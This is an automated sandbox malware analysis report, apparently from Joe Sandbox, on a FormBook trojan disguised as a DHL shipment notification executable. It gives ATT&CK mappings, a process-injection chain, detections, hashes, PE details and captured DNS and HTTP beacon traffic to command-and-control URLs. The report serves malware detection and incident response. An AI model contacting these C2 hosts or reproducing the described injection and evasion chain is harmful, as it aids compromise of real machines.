          Source: Yara match | File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | 1 Native API | Path Interception | 1 Access Token Manipulation | 1 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
          | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 512 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Access Token Manipulation | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 512 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Software Packing | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          Behavior Graph (ID: 626119, Sample: DHL SHIPMENT NOTIFICATION 1..., Startdate: 13/05/2022, Architecture: WINDOWS, Score: 100)
          Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
          Process chain (each process was started or injected by the one listed above it):
          • DHL SHIPMENT NOTIFICATION 1146789443.exe (started): dropped C:\Users\user\AppData\Local\Temp\aeokw.exe, PE32
          • aeokw.exe (started): Tries to detect virtualization through RDTSC time measurements
          • aeokw.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected): System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation. DNS/IP: shops.myshopify.com 23.227.38.74, 49775, 80 CLOUDFLARENETUS Canada; www.ultrakill.xyz 3.64.163.50, 49777, 80 AMAZON-02US United States; 3 other IPs or domains
          • svchost.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started)
          • conhost.exe (started)

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | DHL SHIPMENT NOTIFICATION 1146789443.exe | 43% | Virustotal | |
          | DHL SHIPMENT NOTIFICATION 1146789443.exe | 49% | ReversingLabs | Win32.Trojan.FormBook |
          | DHL SHIPMENT NOTIFICATION 1146789443.exe | 100% | Joe Sandbox ML | |

          No Antivirus matches

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 2.0.aeokw.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.2.aeokw.exe.12a0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 2.0.aeokw.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 2.0.aeokw.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 2.2.aeokw.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          No Antivirus matches

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh | 0% | Avira URL Cloud | safe |
          | http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU | 0% | Avira URL Cloud | safe |
          | http://www.ultrakill.xyz/ | 0% | Avira URL Cloud | safe |
          | http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx | 100% | Avira URL Cloud | malware |
          | www.lgf7.com/amdf/ | 100% | Avira URL Cloud | malware |

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | ghs.google.com | 142.250.185.115 | true | false | | high |
          | www.ultrakill.xyz | 3.64.163.50 | true | true | | unknown |
          | shops.myshopify.com | 23.227.38.74 | true | true | | unknown |
          | www.rtpholywin99.com | unknown | unknown | true | | unknown |
          | www.keilaniclothing.com | unknown | unknown | true | | unknown |

          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh | true | Avira URL Cloud: safe | unknown |
          | http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU | true | Avira URL Cloud: safe | unknown |
          | http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx | false | Avira URL Cloud: malware | unknown |
          | www.lgf7.com/amdf/ | true | Avira URL Cloud: malware | low |

          | Name | Source | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|
          | http://www.ultrakill.xyz/ | svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | http://nsis.sf.net/NSIS_ErrorError | DHL SHIPMENT NOTIFICATION 1146789443.exe | false | | high |

          | IP | Domain | Country | ASN | ASN Name | Malicious |
          |---|---|---|---|---|---|
          | 23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true |
          | 3.64.163.50 | www.ultrakill.xyz | United States | 16509 | AMAZON-02US | true |
          | 142.250.185.115 | ghs.google.com | United States | 15169 | GOOGLEUS | false |

                      Joe Sandbox Version: 34.0.0 Boulder Opal
                      Analysis ID: 626119
                      Start date and time: 2022-05-13 16:08:11 +02:00
                      Joe Sandbox Product: CloudBasic
                      Overall analysis duration: 0h 8m 58s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Sample file name: DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Cookbook file name: default.jbs
                      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed: 25
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Detection: MAL
                      Classification: mal100.troj.evad.winEXE@9/4@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 59.5% (good quality ratio 54.6%)
                      • Quality average: 75.6%
                      • Quality standard deviation: 31.3%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 91
                      • Number of non-executed functions: 179
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes were analyzed, report is missing behavior information
                      No simulations
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                      • 104.17.24.14
                      https://rp.mockplus.com/run/lKCblaEtM9/uLRX_Tg7XZ?cps=collapse&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 188.114.96.10
                      Https://rp.mockplus.com/run/lKCblaEtM9/uLRX_Tg7XZ?cps=collapse&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 188.114.96.10
                      https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=62553350917825036762023184708005776201?https%3A%2F%2Fsign-smpu724eb7r29qzs1gw162nd2cilb0gppxkyfq3q1rk.website%E2%80%8B.yandexcloud.net%23dbrodie@standrew.co.ukGet hashmaliciousBrowse
                      • 104.17.24.14
                      https://securepubads.g.doubleclick.net/pcs/view?adurl=https%3a%2f%2fquzqvm.codesandbox.io?dg=cHJ6ZW15c2xhdy5rcmF3Y3p5a293c2tpQG1hZXJza2RyaWxsaW5nLmNvbQ==Get hashmaliciousBrowse
                      • 104.18.11.207
                      SecuriteInfo.com.W32.AIDetectNet.01.9735.exeGet hashmaliciousBrowse
                      • 188.114.97.10
                      http://trk.mocka.co.nz/ls/click?upn=eCZBEmQvD6uDgCc-2FT-2FpqqKNd8-2BmC0SdCRaUuYELUnbx-2B5YaxqYHhw6gVFl7xLCp8SLLk-2BRQ4orrOW7JEkux6cwfaf5RZaIfhW7wIc0nDRJ3k7w54-2FQxPR5a9-2B7BKV-2Boywv2iY-2B602R2j6AgE5mHZvCRQ-2Bj-2B-2FOyU9LkIM1S0N-2FftI4kAfuxjxzc1RdrZL5c7pEIt5a5QU-2BqMO-2FsYkVseqsCmdoPWx3eVzIxF5PdE-2FEGeCTezZPTlElMbJ1SM7jalXYCP5-2FdWsyAJYFxIv-2B0nPedgVOa-2FQY7V1HpWisZ1nrJg9otVDcUwNpdeZbR1GksLYc47aeJHBO2tsJ-2BYFbQ7OSA-3D-3D_4FP_tujpWh3b734P-2Frq4hFPWR-2FNELU3GikvCFzJozbD11Y1kbWJkFcaCkx67X17NTp7DA0bwB1B1DkHwzWD-2BVa56jeG0WkCJwKbTionezrwwZcXg0VpWRoB6yiz-2BtSYUXIDxVYNKzHhVyxJjKq-2BB8IyvP5WUgdEShHNZ27X3SmILgXRN2abCw2GHkLTa-2B7kVL1pKgqSHvhUwe97rMk0jGoVUPyW7WJivjpcRfMoc-2BcF4LtD-2FVI-2F8CO-2F-2FOS-2FWXoDOC83mnMV-2FLz0ibl-2BWg-2FZQ5iMykfAYgbTK83e-2Bv4p3MUwQm1wl9gZunJiw41mjaibzNzsv23866Fvo9ryQuR6Q7z6b6EB6gFzZZoiv5QCaVhksmqaA9e0HHS-2F6Pff2yNkf8XFh4NYaNcHrdlgckDppLA0fbWYvfxWdfCKqdQRKFpb-2F2-2Fs-3DGet hashmaliciousBrowse
                      • 104.17.24.14
                      https://tmsteels.dotling.com/Get hashmaliciousBrowse
                      • 188.114.96.10
                      No context
                      No context
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):189439
                      Entropy (8bit):7.991246452644623
                      Encrypted:true
                      SSDEEP:3072:nSqfxKHsiwZNRIuqSFpjwuq/D7YfJs8N8p321SwWvM0rscdXjQ4sHnOBfoXdpz4O:nxfxAwWS39q6JsM8U1dWvo+XjZ6dpz8I
                      MD5:5C1283288CC16D3EAAFFF3A0C53CB189
                      SHA1:15804A12C0184AC1F12B053B9640326E1D865F92
                      SHA-256:321FDA60076CDB1D552492333599861F583B01A2F3774F84B3991EE58036AE4F
                      SHA-512:A7FD921DEC02CFFD94AF98CCC8964FEE343BF22DD541939685E85955AC6CC14EEAF661438DFD8B4F45B1852259C98C8BA153D322760F0D033C761B7382A32B9D
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):80384
                      Entropy (8bit):6.294435627366989
                      Encrypted:false
                      SSDEEP:1536:GuTaC+v1M4fr0oxAomP3cX/4pi2sWjcdxpI:Pa524D1/ui5xy
                      MD5:6F70881E0183CE9F78E300CF2C8DC48E
                      SHA1:D2D766CB5654AA367682C41FBC177A146D047D2C
                      SHA-256:D3AFB887DFF82AA5A52C4AD2008DAC9126B854EA2E3EFC729AB27CFAFABA39C2
                      SHA-512:6C5FE5B2A594606B26E5E4D2E05995EB39CC25C0B461AD2882503D45E7705524A6EA9A2E99CB76FB2FFFC0DD992AE1F43153C29ED3E5B98ED68F85EF74807208
                      Malicious:true
                      Reputation:low
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4986
                      Entropy (8bit):6.153505769820207
                      Encrypted:false
                      SSDEEP:96:2JQ3L3rEeKzJzFuuvSKQZ8LFVmhJMYLX2lGNfvw7w4Ihl4FELbgTht7:3wnthuuKKGIchJMYLX2lGSIhl4egThp
                      MD5:F10D9B65FF4DE8235C81704DF991DD2A
                      SHA1:543635DE72F333E9CF19CBA7B0DE572C33AB0E43
                      SHA-256:E9A70DEEF4CDAD4801C117EA5FAF227EFF7026ADBADF19FCC1DEA95674A8E3A0
                      SHA-512:237666835BF885924CFDF5955F6D1583269EE070C9A69EA3835C06A1C60EDDAEC8A19265CB1ED13035F44E335D161B22B0266D1F0F8855E6C0996E425699BD61
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289971
                      Entropy (8bit):7.540713997849172
                      Encrypted:false
                      SSDEEP:6144:JxfxAwWS39q6JsM8U1dWvo+XjZ6dpz89BY2LZwAOuu28u:J/UQlr8sdijQD89LZwSu2J
                      MD5:CD439B40B1EE8F92D024EE3F27772BB3
                      SHA1:8276D5F64B59E97CC2A965B11634FB5CA6454548
                      SHA-256:7DF3145A379DFF6BAE9572B07B4F208AF2ECEA35457A79E3AF440C6C254E3A11
                      SHA-512:054AD8E0CC4501E02E9FDA325A0DC0C6B0807E8D7C8331D6B0D04C31BC0F7D796E6651F1F006FD8020061886E0882FB8F953A9A1C84AB0D48F8B021654D7D116
                      Malicious:false
                      Reputation:low
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.915673728517711
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File size:278331
                      MD5:8fbdf9f70b21179d87b83fe47b2137dd
                      SHA1:146eebe16adad9486cac66f4574810cec1f56cbb
                      SHA256:972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
                      SHA512:4677bcdcaf115ff555b04d00db60fcd12a02be178a95e401bcbccf4130e347fcc315579fa72f7055f490009fcaf3bb4c14cc119432ff1b89756f6f6d5ec62abe
                      SSDEEP:6144:LOtIO6psx/OTz8giqoW/rOiY8FWB55z44pvVwVlTc7:LOL4sBOTYgjFyGcB5h9pcE
                      TLSH:A44412053A44D43BFD3722734E3766738E6E471442B94B1BB3E126257E719C2AB1EB81
                      Icon Hash:b2a88c96b2ca6a72
                      Entrypoint:0x403646
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:61259b55b8912888e90f516ca08dc514
                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A230h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080C8h]
                      mov esi, dword ptr [004080CCh]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007F1EB8BBA36Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007F1EB8BBA33Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [007A8B58h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx
                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804
                      Name                                  Virtual Address  Virtual Size  Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x8504           0xa0          .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3b9000         0xa50         .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                      .text   0x1000           0x67c4        0x6800    False     0.675180288462   data       6.49518266675  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata  0x8000           0x139a        0x1400    False     0.4498046875     data       5.14106681717  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data   0xa000           0x39ebb8      0x600     unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata  0x3a9000         0x10000       0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc   0x3b9000         0xa50         0xc00     False     0.401692708333   data       4.18753619353  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      Name           RVA       Size   Type                                                                             Language  Country
                      RT_ICON        0x3b9190  0x2e8  data                                                                             English   United States
                      RT_DIALOG      0x3b9478  0x100  data                                                                             English   United States
                      RT_DIALOG      0x3b9578  0x11c  data                                                                             English   United States
                      RT_DIALOG      0x3b9698  0x60   data                                                                             English   United States
                      RT_GROUP_ICON  0x3b96f8  0x14   data                                                                             English   United States
                      RT_MANIFEST    0x3b9710  0x33e  XML 1.0 document, ASCII text, with very long lines, with no line terminators     English   United States
                      DLL           Import
                      ADVAPI32.dll  RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                      SHELL32.dll   SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dll     OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dll  ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dll    GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dll     SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dll  GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                      Language of compilation system  Country where language is spoken  Map
                      English                         United States
                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                      May 13, 2022 16:10:37.212352991 CEST  60647        53         192.168.2.4  8.8.8.8
                      May 13, 2022 16:10:37.247565985 CEST  53           60647      8.8.8.8      192.168.2.4
                      May 13, 2022 16:10:57.684124947 CEST  64909        53         192.168.2.4  8.8.8.8
                      May 13, 2022 16:10:57.714978933 CEST  53           64909      8.8.8.8      192.168.2.4
                      May 13, 2022 16:11:20.044547081 CEST  60381        53         192.168.2.4  8.8.8.8
                      May 13, 2022 16:11:20.067533016 CEST  53           60381      8.8.8.8      192.168.2.4
                      Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
                      May 13, 2022 16:10:37.212352991 CEST  192.168.2.4  8.8.8.8  0x190e    Standard query (0)  www.rtpholywin99.com     A (IP address)  IN (0x0001)
                      May 13, 2022 16:10:57.684124947 CEST  192.168.2.4  8.8.8.8  0x2690    Standard query (0)  www.keilaniclothing.com  A (IP address)  IN (0x0001)
                      May 13, 2022 16:11:20.044547081 CEST  192.168.2.4  8.8.8.8  0xdfde    Standard query (0)  www.ultrakill.xyz        A (IP address)  IN (0x0001)
                      Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                     CName                Address          Type                    Class
                      May 13, 2022 16:10:37.247565985 CEST  8.8.8.8    192.168.2.4  0x190e    No error (0)  www.rtpholywin99.com     ghs.google.com       -                CNAME (Canonical name)  IN (0x0001)
                      May 13, 2022 16:10:37.247565985 CEST  8.8.8.8    192.168.2.4  0x190e    No error (0)  ghs.google.com           -                    142.250.185.115  A (IP address)          IN (0x0001)
                      May 13, 2022 16:10:57.714978933 CEST  8.8.8.8    192.168.2.4  0x2690    No error (0)  www.keilaniclothing.com  shops.myshopify.com  -                CNAME (Canonical name)  IN (0x0001)
                      May 13, 2022 16:10:57.714978933 CEST  8.8.8.8    192.168.2.4  0x2690    No error (0)  shops.myshopify.com      -                    23.227.38.74     A (IP address)          IN (0x0001)
                      May 13, 2022 16:11:20.067533016 CEST  8.8.8.8    192.168.2.4  0xdfde    No error (0)  www.ultrakill.xyz        -                    3.64.163.50      A (IP address)          IN (0x0001)
                      • www.rtpholywin99.com
                      • www.keilaniclothing.com
                      • www.ultrakill.xyz
                      Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                      0           192.168.2.4  49773        142.250.185.115  80                C:\Windows\explorer.exe
                      Timestamp                             kBytes transferred  Direction  Data
                      May 13, 2022 16:10:37.269937038 CEST  9887                OUT
                      GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1
                      Host: www.rtpholywin99.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:10:37.426731110 CEST  9888                IN
                      HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=UTF-8
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 13 May 2022 14:10:37 GMT
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Ascii: b12<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta name="description" content="Blogger is a blog publishing tool from Google for easily sharing your thoughts with the world. Blogger makes it simple to post text, photos and video onto your personal or team blog."> <meta name="keywords" content="blogger, blogspot, blog, blogger.com, blogspot.com, personal blog, weblog, create blog, new blog"><base href="https://www.blogger.com"><title>Page not found</title><style type="text/css"> #homeButton { width: 270px; } </style><link href="https://www.blogger.com/static/v1/v-css/3896558673-new_ui_static_pages.css" rel="stylesheet" type="text/css"></head><body class="lang_en rb"><script type="text/javascript"> window.ga=window.ga||function(){(ga.q=ga.q||[]).push(ar
